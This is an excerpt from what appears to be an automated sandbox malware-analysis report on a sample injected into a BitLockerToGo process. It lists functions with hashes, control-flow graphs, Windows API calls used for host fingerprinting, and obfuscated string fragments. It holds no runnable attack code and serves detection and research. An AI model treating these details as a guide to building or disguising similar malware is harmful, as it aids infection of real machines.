                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2367075616557c33f7ffbe59e2a2c0268bee6d58cddcdd5f79e8d22a0b4a0a75
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3352F4B5A04B008FD714EF38D5853AABBE1AF89314F04893ED4DB87791E638E485CB46
                                                                                                                                                                                                              Function 00436980 Relevance: .3, Instructions: 301COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                                                              • Opcode ID: b6bcf7040bbed57b8857a325a4d569f313bf0ba44939ac1ee392cd0bc1efbd62
                                                                                                                                                                                                              • Instruction ID: 3ef0172c1b0fd6102452f61b1f682a93a5c702fb0ee973861230a87bdf11b20f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b6bcf7040bbed57b8857a325a4d569f313bf0ba44939ac1ee392cd0bc1efbd62
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B6715736B043119BD328DF18CC9267BB393EBD9314F26D43EDAD697391EB7458058684
                                                                                                                                                                                                              Function 0040AF59 Relevance: .2, Instructions: 215COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 4f645e16e258cd7c0f8e2478ce1df4953a84b79102b81f51bf9cb67e95845a38
                                                                                                                                                                                                              • Instruction ID: dd1b00007a37aaeb0e23c46eaef9a59656b39fbe93189a0e2ad26de6f0aa502b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4f645e16e258cd7c0f8e2478ce1df4953a84b79102b81f51bf9cb67e95845a38
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D8611179104701CFD3218F64EC94B16B7B5FF8A311F168839F946876B1EB74A862CB19
                                                                                                                                                                                                              Function 00409D39 Relevance: .2, Instructions: 153COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 0615696a12da15777458fcf2419a99d2334abb0ad704679dba1f4d1373da7fa6
                                                                                                                                                                                                              • Instruction ID: 50319d9450d2bc1b12e559979c08195f63fb789cd929903e41858edafaf35703
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0615696a12da15777458fcf2419a99d2334abb0ad704679dba1f4d1373da7fa6
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3C4136706193054BD31CDF25C8527AFB792FFC6304F54DD7DE142CA2A9EB7885058A8A
                                                                                                                                                                                                              Function 0040D307 Relevance: .1, Instructions: 68COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: a131e69dfc0ff879a6e9dcd4b5edb0d3979d92747278feec77fe8072e7b7bb9b
                                                                                                                                                                                                              • Instruction ID: ec9ea2fa370fc3f4155ca673735427f0cab971e73592dcf601490d08f7a15edc
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a131e69dfc0ff879a6e9dcd4b5edb0d3979d92747278feec77fe8072e7b7bb9b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 87218078610601DFD328CF19C880B26B7B2FF89310F199569E8558B3A5DB79E829CB84
                                                                                                                                                                                                              Function 0040C885 Relevance: .0, Instructions: 14COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: fed63a07b80184dd5c583fa40cd8ccaf258bfa8e81da5fbed10aa4f0cdac0a22
                                                                                                                                                                                                              • Instruction ID: 794fcfeaf2393bc4de24d234b0b73bc852a7d0c1d48979df45f9615cc5615d1c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: fed63a07b80184dd5c583fa40cd8ccaf258bfa8e81da5fbed10aa4f0cdac0a22
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B8C012B8B061429FC28A8F10ED889397675BB8BA0EB012928E513D3260CB208402AA1C
                                                                                                                                                                                                              Function 0043B800 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 475 43b800-43b811 476 43b842 475->476 477 43b882-43b888 475->477 478 43b892-43b894 475->478 479 43b860-43b866 call 43a280 475->479 480 43b880 475->480 481 43b840 475->481 482 43b890 475->482 483 43b826-43b83f call 43cdb0 RtlReAllocateHeap 475->483 484 43b818-43b81f 475->484 485 43b848-43b851 call 43a280 475->485 486 43b86f-43b87e call 43a2a0 475->486 476->485 477->482 479->486 480->477 481->476 482->478 483->481 484->477 484->478 484->480 484->481 484->482 484->483 484->486 485->479 486->480
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RtlReAllocateHeap.NTDLL(?,00000000,,yC,00000000,?,00000000,0043792C,00000000,00004000,?,?,?,?,?,?,?), ref: 0043B832
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                                                              • String ID: ,yC
                                                                                                                                                                                                              • API String ID: 1279760036-3745428483
                                                                                                                                                                                                              • Opcode ID: 5d1e9913e8770d5a97fdd42fa78f7a2d659a10438cdbc160b2d273c72e304128
                                                                                                                                                                                                              • Instruction ID: 33fd48210bbda35ad11459605df245acdc4e14f42742f7d3b222364fd982cad6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5d1e9913e8770d5a97fdd42fa78f7a2d659a10438cdbc160b2d273c72e304128
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 92F0AFFA548210DFC2045F24BC01A973768AF8F315F035479F80943221DB3AE414C69B
                                                                                                                                                                                                              Function 00435112 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 58COMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 495 435112-435130 call 43d1d0 498 435132 495->498 499 435134-435137 495->499 498->499 500 43513b-435156 GetUserDefaultUILanguage 499->500 501 435139 499->501 502 435158-43515b 500->502 501->500 503 4351a7-4351d6 502->503 504 43515d-4351a5 502->504 504->502
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetUserDefaultUILanguage.KERNELBASE ref: 0043513B
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: DefaultLanguageUser
                                                                                                                                                                                                              • String ID: jw
                                                                                                                                                                                                              • API String ID: 95929093-279606605
                                                                                                                                                                                                              • Opcode ID: 8fd143bed7b4565bde4c5d5bd80363675cd6eb861a49e854194b01a760ecf153
                                                                                                                                                                                                              • Instruction ID: 31f33ac9812ae1d53d5c8aaf197ee06a540952fd9b70975da2aecf9ed20f900e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8fd143bed7b4565bde4c5d5bd80363675cd6eb861a49e854194b01a760ecf153
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 57110832A1AB504BC7288F39C9503AAB7D26FC9710F5AAB3DD895873D4DA388801C706
                                                                                                                                                                                                              Function 0040C946 Relevance: 3.1, APIs: 2, Instructions: 120COMMON
                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                              control_flow_graph 505 40c946-40caae CoInitializeEx * 2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CoInitializeEx.OLE32(00000000,00000002), ref: 0040C94A
                                                                                                                                                                                                              • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040CA8E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Initialize
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2538663250-0
                                                                                                                                                                                                              • Opcode ID: 8089acbefa084f7ef2651a4c6fa76e1977f34e7290a4e2dd1fa490c46b165ff3
                                                                                                                                                                                                              • Instruction ID: 269ea005b952a61152a448765d35d9cf6bfb96e117828a87c9f9db2dbc4edc09
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8089acbefa084f7ef2651a4c6fa76e1977f34e7290a4e2dd1fa490c46b165ff3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0741E6B4D10B40AFD370EF39CA0B7127EB4AB05250F504B2DF9EA866D4E635A4198BD7
                                                                                                                                                                                                              Function 0042BF8A Relevance: 1.6, APIs: 1, Instructions: 107COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 0042C0A1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ComputerName
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3545744682-0
                                                                                                                                                                                                              • Opcode ID: 0ef94f9000e4fa4065d14da9d66028db5585366479a6b6835adb188af45f5b00
                                                                                                                                                                                                              • Instruction ID: 1c95711534b0e00a0aa94289c6828f8df1262393bc50859e910db5b8208d93bc
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0ef94f9000e4fa4065d14da9d66028db5585366479a6b6835adb188af45f5b00
                                                                                                                                                                                                              • Instruction Fuzzy Hash: FE31293261C79187C72A8F34D8507EB7BE2AFCB305F88856DD4CA9B291D7354406C746
                                                                                                                                                                                                              Function 0042BF88 Relevance: 1.6, APIs: 1, Instructions: 94COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 0042C0A1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ComputerName
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3545744682-0
                                                                                                                                                                                                              • Opcode ID: 4bc0424f0c91a3473afd753e943cd2a984b264c4950c3bc1bd7e5cd3455c717b
                                                                                                                                                                                                              • Instruction ID: dc45a77adc038e9641dbfc558196eecdfe656b94b3adc5cf68800eb90a64c239
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4bc0424f0c91a3473afd753e943cd2a984b264c4950c3bc1bd7e5cd3455c717b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6F21277261865187C7298F30D8517DB77A2ABCB305F88C53DD4CA9B291DB340406C786
                                                                                                                                                                                                              Function 0042BF2F Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 0042C0A1
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ComputerName
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3545744682-0
                                                                                                                                                                                                              • Opcode ID: aeb064ca5cfb78ac6912e124f915a8d66ec1b88869630cfda61cc37693389921
                                                                                                                                                                                                              • Instruction ID: 9bd453f60cb619137add31752274503119b01500be904c84702a9a637c675632
                                                                                                                                                                                                              • Opcode Fuzzy Hash: aeb064ca5cfb78ac6912e124f915a8d66ec1b88869630cfda61cc37693389921
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B4214572B1865187C7298F34D8507EBB7E2ABCB305F88C53DC4CA9B291EA340806C782
                                                                                                                                                                                                              Function 0043B9DD Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetForegroundWindow.USER32 ref: 0043BA3B
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ForegroundWindow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2020703349-0
                                                                                                                                                                                                              • Opcode ID: 2b8e04cabfe00ad42552470da3ea8c51232b6cecaaf7991224432e00482ef3bf
                                                                                                                                                                                                              • Instruction ID: ae2376af06e43d591e544aa1d100e19403503e7caaec75d4ad812d5730cd0d8f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2b8e04cabfe00ad42552470da3ea8c51232b6cecaaf7991224432e00482ef3bf
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 27017BBBC152304FC718DF68DD4069A33A4E7C1305F06E67DEC45AB220EB79990687CA
                                                                                                                                                                                                              Function 0040CAB7 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040CAE5
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InitializeSecurity
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 640775948-0
                                                                                                                                                                                                              • Opcode ID: b345dab2524d561905fef3b01f005a64e6cd4460623fa95d17846ecb88945d2d
                                                                                                                                                                                                              • Instruction ID: d11aeb08f2805c5f0aad2d3c517a9dc16d9abdece8bbcf387af0b6eb180b2945
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b345dab2524d561905fef3b01f005a64e6cd4460623fa95d17846ecb88945d2d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1FE0927028434177E2225B289D57F5437515B02B60F240759F3E1EE2D6C9E07101850C
                                                                                                                                                                                                              Function 0042D526 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: BlanketProxy
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3890896728-0
                                                                                                                                                                                                              • Opcode ID: 062d0a6d3dd76c98753908fade2de77ad8c8f7e68bd7143df4126e6766d6e360
                                                                                                                                                                                                              • Instruction ID: 94eff057e395c15a7efe109b129d3175210669c0d52992a7800d15db9272d1b1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 062d0a6d3dd76c98753908fade2de77ad8c8f7e68bd7143df4126e6766d6e360
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E3F074B45097018FD354DF68D4A871BBBE0EB85304F11882CE5998B291DBB6A558CF86
                                                                                                                                                                                                              Function 0043BA2D Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetForegroundWindow.USER32 ref: 0043BA3B
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ForegroundWindow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2020703349-0
                                                                                                                                                                                                              • Opcode ID: f69193f1f452a33e5ec320b770d671c9ec50282a28d43311b2e95074ca0a3c72
                                                                                                                                                                                                              • Instruction ID: e75b93aa63c92e233c5a34bfb4cd482a6e30767127076f34543c5c249691ecbb
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f69193f1f452a33e5ec320b770d671c9ec50282a28d43311b2e95074ca0a3c72
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9FE092BFD021148FD714EFA0EC105543761F786319705827CDC1517211DA39691BC7C4
                                                                                                                                                                                                              Function 00430569 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: BlanketProxy
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3890896728-0
                                                                                                                                                                                                              • Opcode ID: 8dcff309c6ae7edc8a12e65a504d0c3619956fdc6f5f9a6ce592b71dbf4d3e24
                                                                                                                                                                                                              • Instruction ID: 2191a691f1676ea1963644dabb8b0ea44723e772f2b4e0db76d62e2edecdfe6e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8dcff309c6ae7edc8a12e65a504d0c3619956fdc6f5f9a6ce592b71dbf4d3e24
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 26F074B05097058FE354DF14D4A8B5BBBF0BB89314F11881DE09A8B391D7B5A648CF82
                                                                                                                                                                                                              Function 0043A2A0 Relevance: 1.5, APIs: 1, Instructions: 15memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RtlFreeHeap.NTDLL(?,00000000,00000000,004140DF,00000000), ref: 0043A2C0
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FreeHeap
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3298025750-0
                                                                                                                                                                                                              • Opcode ID: 7251222d94dd1d3facac15d7c2bfa60f6c733de751ea4508c3315d3f2373ab22
                                                                                                                                                                                                              • Instruction ID: ab5d903c12688676c9f1e99bc377567e9c78a850a27ed3e97b7aac3b680b9858
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7251222d94dd1d3facac15d7c2bfa60f6c733de751ea4508c3315d3f2373ab22
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7BD0C975409122EBC6902F28BC15BDB3B649F4A731F0708A2F8406A069C665AC918AD8
                                                                                                                                                                                                              Function 0043A280 Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(?,00000000,004087C1,?,004087C1,00001388), ref: 0043A290
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                                                              • Opcode ID: f1522b5dab1cf2da11f37c44463eac122e6e562cc74522ac74552970da84ba70
                                                                                                                                                                                                              • Instruction ID: f97d0d59657208641b7809d7aa9df25db84e5ea9402b5a29a6046ea1d043b816
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f1522b5dab1cf2da11f37c44463eac122e6e562cc74522ac74552970da84ba70
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E0C04871049121AACA502F15FC09BCA3F68AF8A360F0A10A6B844660B1C661BC828A98

                                                                                                                                                                                                              Non-executed Functions

                                                                                                                                                                                                              Function 00411BB0 Relevance: 50.6, Strings: 39, Instructions: 1804COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: u$u$ u$#$$N$$u$1$4$53$5u$:$=$D$D$Fu$G$J$Ou$Vu$W:$Wu$YL$_L$`$`$a$eu$f$gu$hu$iu$i$ku$ou$ou$r!$su$wu$.
                                                                                                                                                                                                              • API String ID: 0-1297114619
                                                                                                                                                                                                              • Opcode ID: 58b6f396e5f66a77703e977543d4979c921445a7395f89a2492088771659af1e
                                                                                                                                                                                                              • Instruction ID: 3d25608720fc248fed8d15c48dbd04b497e5b2bc4c78e1578a4b9e3efca3bb82
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 58b6f396e5f66a77703e977543d4979c921445a7395f89a2492088771659af1e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 39F2AC7551C3808BC324AF29C5853EFBBE1AF85310F14892EE9D997391E7788981CB4B
                                                                                                                                                                                                              Function 00431C10 Relevance: 43.9, APIs: 2, Strings: 23, Instructions: 173COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MetricsSystem
                                                                                                                                                                                                              • String ID: $ "C$$%C$$)C$(&C$?(C$H%C$L&C$i"C$o%C$p!C$'C$'C$'C$'C$'C$'C$'C$'C$'C$'C$'C$'C
                                                                                                                                                                                                              • API String ID: 4116985748-1337545606
                                                                                                                                                                                                              • Opcode ID: 5ba615d0c2055df3fecca8f494ee0eeee7678f8c4cc7a0e6020c1d6db8d3eef0
                                                                                                                                                                                                              • Instruction ID: 8044c1868bac973a8dda2efc51331480648de41511a2985fbe6f7e63c9d69fb2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5ba615d0c2055df3fecca8f494ee0eeee7678f8c4cc7a0e6020c1d6db8d3eef0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 52B15CB44097849FE774DF15E58978ABBF0BBC5308F00891EE5988B351D7B89948CF8A
                                                                                                                                                                                                              Function 0040D9ED Relevance: 24.3, APIs: 1, Strings: 15, Instructions: 305COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Uninitialize
                                                                                                                                                                                                              • String ID: !=s=$"=6=$#=<=$$='=$&=O=$)=k=$,="=$1=g=$3=2=$6= =$8=1=$9=+=$<=)=$q=l=$}=p=
                                                                                                                                                                                                              • API String ID: 3861434553-2084406169
                                                                                                                                                                                                              • Opcode ID: b23ca35d2ca6ed04d69cbad4dac612794351e0670c1052edcc4022b74a7f11f3
                                                                                                                                                                                                              • Instruction ID: c8467379c40931654f9108cc5a18d97ccb743dfa112c618ed77d89b6e048be37
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b23ca35d2ca6ed04d69cbad4dac612794351e0670c1052edcc4022b74a7f11f3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 68B1E2B4A047428BD728CF69C490222FBF1FF9630071885AEC4D68F796D739E845CB96
                                                                                                                                                                                                              Function 00423470 Relevance: 17.1, Strings: 13, Instructions: 806COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
